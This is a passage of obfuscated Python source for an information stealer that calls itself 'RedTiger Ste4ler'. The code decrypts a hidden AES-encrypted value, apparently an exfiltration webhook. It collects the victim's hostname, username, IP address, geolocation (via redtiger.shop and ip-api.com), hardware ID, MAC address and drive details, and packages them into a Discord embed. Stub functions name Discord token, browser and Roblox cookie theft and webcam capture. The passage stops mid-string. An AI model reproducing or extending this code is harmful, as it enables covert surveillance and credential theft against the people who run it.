
import sys

def On1y_W1nd0w5():
    if sys.platform.startswith("win"):
        return False
    else:
        return True

try: PWYYCBPJGOTUCLQWOWGQLEQLGARPTTSGJQHPTNZQPDYLJMWSYDVITGUXNEIFZYXZUPWKMGWGJZQKFYWZVDMODTJPZTGXAHP = On1y_W1nd0w5()
except: PWYYCBPJGOTUCLQWOWGQLEQLGARPTTSGJQHPTNZQPDYLJMWSYDVITGUXNEIFZYXZUPWKMGWGJZQKFYWZVDMODTJPZTGXAHP = False

if PWYYCBPJGOTUCLQWOWGQLEQLGARPTTSGJQHPTNZQPDYLJMWSYDVITGUXNEIFZYXZUPWKMGWGJZQKFYWZVDMODTJPZTGXAHP == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import threading
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def B10ck_K3y(): pass
def Unb10ck_K3y(): pass
def B10ck_T45k_M4n4g3r(): pass
def B10ck_M0u53(): pass
def B10ck_W3b5it3(): pass
def St4rtup(): pass
def Sy5t3m_Inf0(): pass
def Op3n_U53r_Pr0fi13_53tting5(): pass
def Scr33n5h0t(): pass
def C4m3r4_C4ptur3(): pass
def Di5c0rd_T0k3n(): pass
def Di5c0rd_inj3c710n(): pass
def Br0w53r_5t341(): pass
def R0b10x_C00ki3(): pass
def F4k3_3rr0r(): pass
def Sp4m_0p3n_Pr0gr4m(): pass
def Sp4m_Cr34t_Fil3(): pass
def Shutd0wn(): pass
def Sp4m_Opti0ns(): pass
def R3st4rt(): pass

def Clear():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def Decrypt(GAPOORRFPAXJVMUMZXALVUSWEJJDTPGPQOSLHAZNNOUDZNNQVQQSYONYBZDPRVUQSQZFTAGREGBVPASLBDPIAMISFAXJAEPI, v4r_key):
    def DeriveKey(v4r_password, v4r_salt):
        v4r_kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=v4r_salt, iterations=100000, backend=default_backend())
        if isinstance(v4r_password, str):  
            v4r_password = v4r_password.encode()  
        return v4r_kdf.derive(v4r_password)

    GAPOORRFPAXJVMUMZXALVUSWEJJDTPGPQOSLHAZNNOUDZNNQVQQSYONYBZDPRVUQSQZFTAGREGBVPASLBDPIAMISFAXJAEPI_data = base64.b64decode(GAPOORRFPAXJVMUMZXALVUSWEJJDTPGPQOSLHAZNNOUDZNNQVQQSYONYBZDPRVUQSQZFTAGREGBVPASLBDPIAMISFAXJAEPI)
    v4r_salt = GAPOORRFPAXJVMUMZXALVUSWEJJDTPGPQOSLHAZNNOUDZNNQVQQSYONYBZDPRVUQSQZFTAGREGBVPASLBDPIAMISFAXJAEPI_data[:16]
    v4r_iv = GAPOORRFPAXJVMUMZXALVUSWEJJDTPGPQOSLHAZNNOUDZNNQVQQSYONYBZDPRVUQSQZFTAGREGBVPASLBDPIAMISFAXJAEPI_data[16:32]
    GAPOORRFPAXJVMUMZXALVUSWEJJDTPGPQOSLHAZNNOUDZNNQVQQSYONYBZDPRVUQSQZFTAGREGBVPASLBDPIAMISFAXJAEPI_data = GAPOORRFPAXJVMUMZXALVUSWEJJDTPGPQOSLHAZNNOUDZNNQVQQSYONYBZDPRVUQSQZFTAGREGBVPASLBDPIAMISFAXJAEPI_data[32:]
    v4r_derived_key = DeriveKey(v4r_key, v4r_salt)
    v4r_cipher = Cipher(algorithms.AES(v4r_derived_key), modes.CBC(v4r_iv), backend=default_backend())
    v4r_decryptor = v4r_cipher.decryptor()
    v4r_decrypted_data = v4r_decryptor.update(GAPOORRFPAXJVMUMZXALVUSWEJJDTPGPQOSLHAZNNOUDZNNQVQQSYONYBZDPRVUQSQZFTAGREGBVPASLBDPIAMISFAXJAEPI_data) + v4r_decryptor.finalize()
    v4r_unpadder = padding.PKCS7(128).unpadder()
    v4r_original_data = v4r_unpadder.update(v4r_decrypted_data) + v4r_unpadder.finalize()
    return v4r_original_data.decode()

RBPEVILQWDPRUVYMCQJMLAUSRLMQRLBDALSYCRCZSYIIWSSNSMMBMTKOWIUWSVEXBSHMHIQN = r"""
36+ihKNwRWKDbAXEhfMJ7DH9rff+QbwSBSkoik8EfIk4nWObUoS91ocx8xjV15sfH7jH5XCurnlyZjSW/gF5yf+gza++VJ1E5OWXq/j89OU=
"""
QIZVRSAKMHZYRPYMQRZDQGWPQUXLOJQRNCPRNLFBRRGHPSYWBTKKEGNXLMRBERRYCS = "ptahzMpJmunUVgfhcUNwJJwEchokVaqcRVrfEtwJzvLxNpxWOXPiolHXozLwWYeiqSEMEuGqoeqDmTDLlroogHnIgDdyZeiGboXbLxiLtrnRneqrJjtlpCsipBqSTiTwHGayYtVgRrqkOTGTQLnWq"
BZGGPHSPHRXHRTPFFLYRRCIQJVZGJFWWAYADBZSDGGYIWLVZTPCJAQLYCPJYYNIHBQGAJQNQJDAHJGGJFTRDIIGWSXVA = "redtiger.shop"
XFOCFMWETLKNBSGDAFNFPWWACXSQQTCJMGVLOODVUMYRIZSMGDCTBJPDVLRHRLUIHGCHDKUBXUAFROMKLGEHXNTNSQXDNMH = 0xa80505
CMKPWIFCSFCTSNNVOGCCKVQEYKRAXRHOBFRMIJVXPYIPEACUDGZUIXNGDSPUGBWRSLWEMRRWYXKICA = "RedTiger Ste4ler"
VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM = "https://cdn.discordapp.com/attachments/1268900329605300234/1276010081665683497/RedTiger-Logo.png?ex=66cf38be&is=66cde73e&hm=696c53b4791044ca0495d87f92e6d603e8383315d2ebdd385aaccfc6dbf6aa77&"
GYWFMHHKMFRPCNVJZJWRQOJUYSYYUCFCRJDGJTVSFVWCOQZTQBPCFFLUZFNK = "RedTiger Ste4ler - github.com/loxy0dev/RedTiger-Tools"
VQFWCVDEJFBYWVFZYNZISJARUAOVVUHCPWYMIWEVINRICGVQWRLDBASKKKIYCSWTVZTCLHUDPTYLYCTWCKS = {
        "text": GYWFMHHKMFRPCNVJZJWRQOJUYSYYUCFCRJDGJTVSFVWCOQZTQBPCFFLUZFNK,
        "icon_url": VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM,
        }
                 
PTUGQSXYYQRVUXAQTVBEUHRVYOCRRPRXITWHNZTMFWZKVOLIDOJQSQJYTUXBGCAPTLMSERXVDRQEHYEN = Decrypt(RBPEVILQWDPRUVYMCQJMLAUSRLMQRLBDALSYCRCZSYIIWSSNSMMBMTKOWIUWSVEXBSHMHIQN, QIZVRSAKMHZYRPYMQRZDQGWPQUXLOJQRNCPRNLFBRRGHPSYWBTKKEGNXLMRBERRYCS)

try: AYJDELFHNJJEYFEIERFKRPYTUHAZFMHONBHAHROYRIXUJKNYKPFOBEEFDAT = socket.gethostname()
except: AYJDELFHNJJEYFEIERFKRPYTUHAZFMHONBHAHROYRIXUJKNYKPFOBEEFDAT = "None"

try: ILBCVNKJOZYXEBSMFYCOKUQVEHDRAVNOOIFWGAWQYMPVUGGZERUCKJZOHDUJGRBIBWHCJXXVDQZTMXMRNZSHPALBRBYBST = os.getlogin()
except: ILBCVNKJOZYXEBSMFYCOKUQVEHDRAVNOOIFWGAWQYMPVUGGZERUCKJZOHDUJGRBIBWHCJXXVDQZTMXMRNZSHPALBRBYBST = "None"

try: VNUMRSRSUZFAZHXGSPYBCHGJUHPDIAONQHYADAFENDIHLGVQOXDRAXHPZZEDIROKJMZRDYJCYVAKIBZIBWFYQGRE = win32api.GetUserNameEx(win32api.NameDisplay)
except: VNUMRSRSUZFAZHXGSPYBCHGJUHPDIAONQHYADAFENDIHLGVQOXDRAXHPZZEDIROKJMZRDYJCYVAKIBZIBWFYQGRE = "None"

try: TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR = "None"

try: AHPTQAJQLIIZWEMCJWDMQQQPFUPHTDJTMBAJYZTSTHQUISYEBUFOSRFSPALYHUVBHGLXDKT = socket.gethostbyname(socket.gethostname())
except: AHPTQAJQLIIZWEMCJWDMQQQPFUPHTDJTMBAJYZTSTHQUISYEBUFOSRFSPALYHUVBHGLXDKT = "None"

try:
    UMMVJZRCGSSLLPKOTELHNAVDOVGLSWQPOJYUZKNUFLEMZXNNRTWVV = requests.get(f"https://{BZGGPHSPHRXHRTPFFLYRRCIQJVZGJFWWAYADBZSDGGYIWLVZTPCJAQLYCPJYYNIHBQGAJQNQJDAHJGGJFTRDIIGWSXVA}/api/ip/ip={TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR}")
    JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK = UMMVJZRCGSSLLPKOTELHNAVDOVGLSWQPOJYUZKNUFLEMZXNNRTWVV.json()

    FYIJUFTGXIBRKNBDTVHCZBEYACVJUJKPCVJIJTLGVMVCXEHVYXDCUKFBUUXOJGCWKEVJHGNJLVXXUDRAQIXUZHRANBKQ = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('country', "None")
    FYIJUFTGXIBRKNBDTVHCZBEYACVJUJKPCVJIJTLGVMVCXEHVYXDCUKFBUUXOJGCWKEVJHGNJLVXXUDRAQIXUZHRANBKQ_code = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('country_code', "None")
    VFYEWZUKOEPRJWFGVEUEUSJAXGMIKFCRWULJWOPUNYTMWXMFCUYLOLRNVKGBHGM = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('region', "None")
    VFYEWZUKOEPRJWFGVEUEUSJAXGMIKFCRWULJWOPUNYTMWXMFCUYLOLRNVKGBHGM_code = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('region_code', "None")
    PJHZPIPOEGEKNMVVGZZAVGQPRXQNARFNCOIHMKSANZKTCJSSPDGGFGPIEDLGPYAMLPRVFXYAXOXSRCGFDLYY = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('zip', "None")
    BUSGCXAQKBTDHNEHVZPOZKLYLTSXJKRZMQAVFWZAFJCBVESUBTQPUARZXYCKVOAHSFZQIBQCPBJTVMXWKOHGMSRUNFU = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('city', "None")
    OQKZTMCQFWOOGNNMUVVXZSIECYBZFUBWOXSMRXMSMTDOVHKGIOSPAVMVMOQOERWCIXUAYGMWNIKVEUPCFZOCVEFCPGUYDHGPNDPI = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('latitude', "None")
    NGHFJYDOMXUPPNZUHUVTXQKRBHQERHJCKKJEZGRFZHIRSWLELWMRWEAFZNETSMRTEKNPBUEQLWIMY = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('longitude', "None")
    KRZHWBOVVRCBWMCORRCHNXNTVRHJSZLLTGCBNUURRHTROIHMKKCSOMWHSU = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('timezone', "None")
    EICOEXOKOGDAKOVNGLRGQELXLWUKPGBTRMRXIHKXSQVUMWDNSKDZXDGYEOYIIWFVCDPCNJFXRXM = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('isp', "None")
    AAIQFFKUCOIWHAGAUHZBCTUFEJSIDHJFUPOBGQCSOUTUMJULTFT = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('org', "None")
    KBTHTWDIQSXJDUVHFKCEJFYOZDZFYVOWWTTRXHVCQMYUGBKQSJHZDETFYLCXCLNAEEBPWVRUZXKOEJJUKSHQYXRLLAQ = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('as', "None")
except:
    UMMVJZRCGSSLLPKOTELHNAVDOVGLSWQPOJYUZKNUFLEMZXNNRTWVV = requests.get(f"http://ip-api.com/json/{TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR}")
    JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK = UMMVJZRCGSSLLPKOTELHNAVDOVGLSWQPOJYUZKNUFLEMZXNNRTWVV.json()

    FYIJUFTGXIBRKNBDTVHCZBEYACVJUJKPCVJIJTLGVMVCXEHVYXDCUKFBUUXOJGCWKEVJHGNJLVXXUDRAQIXUZHRANBKQ = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('country', "None")
    FYIJUFTGXIBRKNBDTVHCZBEYACVJUJKPCVJIJTLGVMVCXEHVYXDCUKFBUUXOJGCWKEVJHGNJLVXXUDRAQIXUZHRANBKQ_code = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('countryCode', "None")
    VFYEWZUKOEPRJWFGVEUEUSJAXGMIKFCRWULJWOPUNYTMWXMFCUYLOLRNVKGBHGM = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('regionName', "None")
    VFYEWZUKOEPRJWFGVEUEUSJAXGMIKFCRWULJWOPUNYTMWXMFCUYLOLRNVKGBHGM_code = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('region', "None")
    PJHZPIPOEGEKNMVVGZZAVGQPRXQNARFNCOIHMKSANZKTCJSSPDGGFGPIEDLGPYAMLPRVFXYAXOXSRCGFDLYY = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('zip', "None")
    BUSGCXAQKBTDHNEHVZPOZKLYLTSXJKRZMQAVFWZAFJCBVESUBTQPUARZXYCKVOAHSFZQIBQCPBJTVMXWKOHGMSRUNFU = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('city', "None")
    OQKZTMCQFWOOGNNMUVVXZSIECYBZFUBWOXSMRXMSMTDOVHKGIOSPAVMVMOQOERWCIXUAYGMWNIKVEUPCFZOCVEFCPGUYDHGPNDPI = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('lat', "None")
    NGHFJYDOMXUPPNZUHUVTXQKRBHQERHJCKKJEZGRFZHIRSWLELWMRWEAFZNETSMRTEKNPBUEQLWIMY = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('lon', "None")
    KRZHWBOVVRCBWMCORRCHNXNTVRHJSZLLTGCBNUURRHTROIHMKKCSOMWHSU = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('timezone', "None")
    EICOEXOKOGDAKOVNGLRGQELXLWUKPGBTRMRXIHKXSQVUMWDNSKDZXDGYEOYIIWFVCDPCNJFXRXM = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('isp', "None")
    AAIQFFKUCOIWHAGAUHZBCTUFEJSIDHJFUPOBGQCSOUTUMJULTFT = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('org', "None")
    KBTHTWDIQSXJDUVHFKCEJFYOZDZFYVOWWTTRXHVCQMYUGBKQSJHZDETFYLCXCLNAEEBPWVRUZXKOEJJUKSHQYXRLLAQ = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('as', "None")

def Sy5t3m_Inf0():
    import platform
    import subprocess
    import uuid
    import psutil
    import GPUtil
    import ctypes
    import win32api
    import string
    import screeninfo
    from discord import SyncWebhook, Embed

    try: DBYKKUNBQXNZKOAMIIDPQKORNPYMNLAYUTNRJWVDJSKTPANFHBIAFLWBGH = {platform.system()}
    except: DBYKKUNBQXNZKOAMIIDPQKORNPYMNLAYUTNRJWVDJSKTPANFHBIAFLWBGH = "None"

    try: CBKJXOUZFEAUJEJPOAPMTGPXQTIMWLKKBFJIAQOLOAMWMBAPDNYHYZMMPLNAKIHPPPGNBQCPJOHRFTKXCMXORGZV = platform.version()
    except: CBKJXOUZFEAUJEJPOAPMTGPXQTIMWLKKBFJIAQOLOAMWMBAPDNYHYZMMPLNAKIHPPPGNBQCPJOHRFTKXCMXORGZV = "None"

    try: KKKWRUHGYLFJKRIQYTPLKBTIIOWOBUSDHCPRZBHKKCVHBUQNTTSRMOGHQGMQCDAAXOSQSPNPWDP = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
    except: KKKWRUHGYLFJKRIQYTPLKBTIIOWOBUSDHCPRZBHKKCVHBUQNTTSRMOGHQGMQCDAAXOSQSPNPWDP = "None"

    try: DOGGWLUQOPRGHBXQKYACBCUXJFPYRRWNBPPZUTQWWVDXASXDWWVUTUIZBKPECPLQTUVUXSGR = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
    except: DOGGWLUQOPRGHBXQKYACBCUXJFPYRRWNBPPZUTQWWVDXASXDWWVUTUIZBKPECPLQTUVUXSGR = "None"

    try: HVIMUTPFWJOQSLNXMFQQNGJWLIMQRZJNNVVHNBGFEJXWMLQCXEQME = round(psutil.virtual_memory().total / (1024**3), 2)
    except: HVIMUTPFWJOQSLNXMFQQNGJWLIMQRZJNNVVHNBGFEJXWMLQCXEQME = "None"

    try: RKQOJZCLGFSOQAENXPFNABJFPADTTEJSVUFFATYBKNONEPOGTZRECVYZNSPA = platform.processor()
    except: RKQOJZCLGFSOQAENXPFNABJFPADTTEJSVUFFATYBKNONEPOGTZRECVYZNSPA = "None"

    try: IAKFYBECJPYPTCFSVAYCFSHDWKSIZDMDSZLPEZMYHAAGPTWIYMERJIMZVKGKRGRCXJIORPISVZFBYQALMVBFYKL = psutil.cpu_count(logical=False)
    except: IAKFYBECJPYPTCFSVAYCFSHDWKSIZDMDSZLPEZMYHAAGPTWIYMERJIMZVKGKRGRCXJIORPISVZFBYQALMVBFYKL = "None"

    try: GDZRBKCMHNTINJGJJCHWNAOERWTCGOWYAPUBNJSIMKLKJKSMVCBHFIXBVWXNXLUVLDASDOCETYDOGYZOUCPRFQL = GPUtil.getGPUs()[0].name if GPUtil.getGPUs() else "None"
    except: GDZRBKCMHNTINJGJJCHWNAOERWTCGOWYAPUBNJSIMKLKJKSMVCBHFIXBVWXNXLUVLDASDOCETYDOGYZOUCPRFQL = "None"

    try:
        UBNEWYSXBPTDRAUEQTEXGESYGNQFLXVKATKNGWIYGSUMQFKPCDWQVAXMLKBSEVIKBYR = []
        GRINBRATHRTLEIFUWOLEXSMNLTZGPVFEEHWWZRCMIFLSFDQBQYTSQDHNMNARMOAYWQTNAAYWJUBDRFRZUEPHRQQRWYNYS = ctypes.windll.kernel32.GetLogicalDrives()
        for v4r_letter in string.ascii_uppercase:
            if GRINBRATHRTLEIFUWOLEXSMNLTZGPVFEEHWWZRCMIFLSFDQBQYTSQDHNMNARMOAYWQTNAAYWJUBDRFRZUEPHRQQRWYNYS & 1:
                LTGODTXRVYFWPNSTMAWSEICAHMURNAXFLKYLXUVEEXMVUEPAQUXDA = v4r_letter + ":\\"
                try:
                    FVPBPOWCBTIUVNAAXUOCJNCZXRTWNCZBGEVIMQDVKQLWGNSZJKQ = ctypes.c_ulonglong(0)
                    TENVBBKENUZSXPEXRJKLPIJYSZQOBSYVDQVIMZIIXDVFZNWNKNDUUOWGMFAMUBGHSMNIJWPVLBCGTLZDYWMRVKEBSZZMK = ctypes.c_ulonglong(0)
                    ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(LTGODTXRVYFWPNSTMAWSEICAHMURNAXFLKYLXUVEEXMVUEPAQUXDA), None, ctypes.pointer(TENVBBKENUZSXPEXRJKLPIJYSZQOBSYVDQVIMZIIXDVFZNWNKNDUUOWGMFAMUBGHSMNIJWPVLBCGTLZDYWMRVKEBSZZMK), ctypes.pointer(FVPBPOWCBTIUVNAAXUOCJNCZXRTWNCZBGEVIMQDVKQLWGNSZJKQ))
                    AIFZDQLEIQCYIGLJPGMNYNIQXXSYYTJUGEGRZAUZNFURZRMAENZLLRIOSKYG = TENVBBKENUZSXPEXRJKLPIJYSZQOBSYVDQVIMZIIXDVFZNWNKNDUUOWGMFAMUBGHSMNIJWPVLBCGTLZDYWMRVKEBSZZMK.value
                    RWPJWJADOLUWSMWGPPAPJEZLZLXUNLSWQJGGMPYFYOIYHZPPJSRRODIQHKBZJMVBDAAEISGSPQSMFXRGJCSTQKUQNAYDSCHHJMR = FVPBPOWCBTIUVNAAXUOCJNCZXRTWNCZBGEVIMQDVKQLWGNSZJKQ.value
                    TAJZDGANFEJNPIDJXUUGZEOIOXSJVJKVLEFUBONJIMXMQHACHNJDBFACBZRLHNQDVMQYZMYHQESNAADLSBTRLOTDTDR = AIFZDQLEIQCYIGLJPGMNYNIQXXSYYTJUGEGRZAUZNFURZRMAENZLLRIOSKYG - RWPJWJADOLUWSMWGPPAPJEZLZLXUNLSWQJGGMPYFYOIYHZPPJSRRODIQHKBZJMVBDAAEISGSPQSMFXRGJCSTQKUQNAYDSCHHJMR
                    PLZYIBSIEWRRBZBZFMHVBFFRVBEIMOMASYRYEEWEJGJBNEIRKHHRAWBFWOUWRCFFPEOOHILRYGEFD = win32api.GetVolumeInformation(LTGODTXRVYFWPNSTMAWSEICAHMURNAXFLKYLXUVEEXMVUEPAQUXDA)[0]
                    drive = {
                        'drive': LTGODTXRVYFWPNSTMAWSEICAHMURNAXFLKYLXUVEEXMVUEPAQUXDA,
                        'total': AIFZDQLEIQCYIGLJPGMNYNIQXXSYYTJUGEGRZAUZNFURZRMAENZLLRIOSKYG,
                        'free': RWPJWJADOLUWSMWGPPAPJEZLZLXUNLSWQJGGMPYFYOIYHZPPJSRRODIQHKBZJMVBDAAEISGSPQSMFXRGJCSTQKUQNAYDSCHHJMR,
                        'used': TAJZDGANFEJNPIDJXUUGZEOIOXSJVJKVLEFUBONJIMXMQHACHNJDBFACBZRLHNQDVMQYZMYHQESNAADLSBTRLOTDTDR,
                        'name': PLZYIBSIEWRRBZBZFMHVBFFRVBEIMOMASYRYEEWEJGJBNEIRKHHRAWBFWOUWRCFFPEOOHILRYGEFD,
                    }
                    UBNEWYSXBPTDRAUEQTEXGESYGNQFLXVKATKNGWIYGSUMQFKPCDWQVAXMLKBSEVIKBYR.append(drive)
                except:
                    ()
            GRINBRATHRTLEIFUWOLEXSMNLTZGPVFEEHWWZRCMIFLSFDQBQYTSQDHNMNARMOAYWQTNAAYWJUBDRFRZUEPHRQQRWYNYS >>= 1

        MNOTAAXYLBLYWGLTURSRYMNKILIDRUCKVHZGUMWVYSHXJEEATSKSTQYSDCIQTQHRXVUKRUIQWUZTZHLVFDOQXHMPUNHNUWLZIYD = "{:<7} {:<10} {:<10} {:<10} {:<20}\n".format("Drive:", "Free:", "Total:", "Use:", "Name:")
        for v4r_drive in UBNEWYSXBPTDRAUEQTEXGESYGNQFLXVKATKNGWIYGSUMQFKPCDWQVAXMLKBSEVIKBYR:
            LNGXDHJAGAGBZBKWJKDQITGAOBXTGHAXLAXMOKPSBHCVRLIJSDZV = (v4r_drive['used'] / v4r_drive['total']) * 100
            RWPJWJADOLUWSMWGPPAPJEZLZLXUNLSWQJGGMPYFYOIYHZPPJSRRODIQHKBZJMVBDAAEISGSPQSMFXRGJCSTQKUQNAYDSCHHJMR_gb = "{:.2f}GO".format(v4r_drive['free'] / (1024 ** 3))
            AIFZDQLEIQCYIGLJPGMNYNIQXXSYYTJUGEGRZAUZNFURZRMAENZLLRIOSKYG_gb = "{:.2f}GO".format(v4r_drive['total'] / (1024 ** 3))
            LNGXDHJAGAGBZBKWJKDQITGAOBXTGHAXLAXMOKPSBHCVRLIJSDZV_str = "{:.2f}%".format(LNGXDHJAGAGBZBKWJKDQITGAOBXTGHAXLAXMOKPSBHCVRLIJSDZV)
            MNOTAAXYLBLYWGLTURSRYMNKILIDRUCKVHZGUMWVYSHXJEEATSKSTQYSDCIQTQHRXVUKRUIQWUZTZHLVFDOQXHMPUNHNUWLZIYD += "{:<7} {:<10} {:<10} {:<10} {:<20}".format(v4r_drive['drive'], 
                                                                   RWPJWJADOLUWSMWGPPAPJEZLZLXUNLSWQJGGMPYFYOIYHZPPJSRRODIQHKBZJMVBDAAEISGSPQSMFXRGJCSTQKUQNAYDSCHHJMR_gb,
                                                                   AIFZDQLEIQCYIGLJPGMNYNIQXXSYYTJUGEGRZAUZNFURZRMAENZLLRIOSKYG_gb,
                                                                   LNGXDHJAGAGBZBKWJKDQITGAOBXTGHAXLAXMOKPSBHCVRLIJSDZV_str,
                                                                   v4r_drive['name'])
    except:
        MNOTAAXYLBLYWGLTURSRYMNKILIDRUCKVHZGUMWVYSHXJEEATSKSTQYSDCIQTQHRXVUKRUIQWUZTZHLVFDOQXHMPUNHNUWLZIYD = """Drive:  Free:      Total:     Use:       Name:       
None    None       None       None       None     
"""

    try:
        def is_portable():
            try:
                battery = psutil.sensors_battery()
                return battery is not None and battery.power_plugged is not None
            except AttributeError:
                return False

        if is_portable():
            VPNMRHZWZVTNREWPSVXFFEXVCGKJAUIPMMGUQAPIHJZEQJQYOEIASITMSKSAMNFBIJEANRFWCNSLR = 'Pc Portable'
        else:
            VPNMRHZWZVTNREWPSVXFFEXVCGKJAUIPMMGUQAPIHJZEQJQYOEIASITMSKSAMNFBIJEANRFWCNSLR = 'Pc Fixed'
    except:
        VPNMRHZWZVTNREWPSVXFFEXVCGKJAUIPMMGUQAPIHJZEQJQYOEIASITMSKSAMNFBIJEANRFWCNSLR = "None"

    try: JHSXNLZMYTFXUVNNMKCMGOBQZVUOINEDPDOFHPYINXJVBECURHQIUYCSOZDOXCDTJKOQISQGWRHZMRCJLCABOWSOMOECTNKW = len(screeninfo.get_monitors())
    except: JHSXNLZMYTFXUVNNMKCMGOBQZVUOINEDPDOFHPYINXJVBECURHQIUYCSOZDOXCDTJKOQISQGWRHZMRCJLCABOWSOMOECTNKW = "None"

    embed = Embed(title=f'System Info `{ILBCVNKJOZYXEBSMFYCOKUQVEHDRAVNOOIFWGAWQYMPVUGGZERUCKJZOHDUJGRBIBWHCJXXVDQZTMXMRNZSHPALBRBYBST} "{TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR}"`:', color=XFOCFMWETLKNBSGDAFNFPWWACXSQQTCJMGVLOODVUMYRIZSMGDCTBJPDVLRHRLUIHGCHDKUBXUAFROMKLGEHXNTNSQXDNMH)

    embed.add_field(name=":bust_in_silhouette: User Pc:", value=f"""```Hostname    : {AYJDELFHNJJEYFEIERFKRPYTUHAZFMHONBHAHROYRIXUJKNYKPFOBEEFDAT}
Username    : {ILBCVNKJOZYXEBSMFYCOKUQVEHDRAVNOOIFWGAWQYMPVUGGZERUCKJZOHDUJGRBIBWHCJXXVDQZTMXMRNZSHPALBRBYBST}
DisplayName : {VNUMRSRSUZFAZHXGSPYBCHGJUHPDIAONQHYADAFENDIHLGVQOXDRAXHPZZEDIROKJMZRDYJCYVAKIBZIBWFYQGRE}```""", inline=False)

    embed.add_field(name=":computer: System:", value=f"""```Plateform     : {VPNMRHZWZVTNREWPSVXFFEXVCGKJAUIPMMGUQAPIHJZEQJQYOEIASITMSKSAMNFBIJEANRFWCNSLR}
Exploitation  : {DBYKKUNBQXNZKOAMIIDPQKORNPYMNLAYUTNRJWVDJSKTPANFHBIAFLWBGH} {CBKJXOUZFEAUJEJPOAPMTGPXQTIMWLKKBFJIAQOLOAMWMBAPDNYHYZMMPLNAKIHPPPGNBQCPJOHRFTKXCMXORGZV}
Screen Number : {JHSXNLZMYTFXUVNNMKCMGOBQZVUOINEDPDOFHPYINXJVBECURHQIUYCSOZDOXCDTJKOQISQGWRHZMRCJLCABOWSOMOECTNKW}

HWID : {DOGGWLUQOPRGHBXQKYACBCUXJFPYRRWNBPPZUTQWWVDXASXDWWVUTUIZBKPECPLQTUVUXSGR}
MAC  : {KKKWRUHGYLFJKRIQYTPLKBTIIOWOBUSDHCPRZBHKKCVHBUQNTTSRMOGHQGMQCDAAXOSQSPNPWDP}
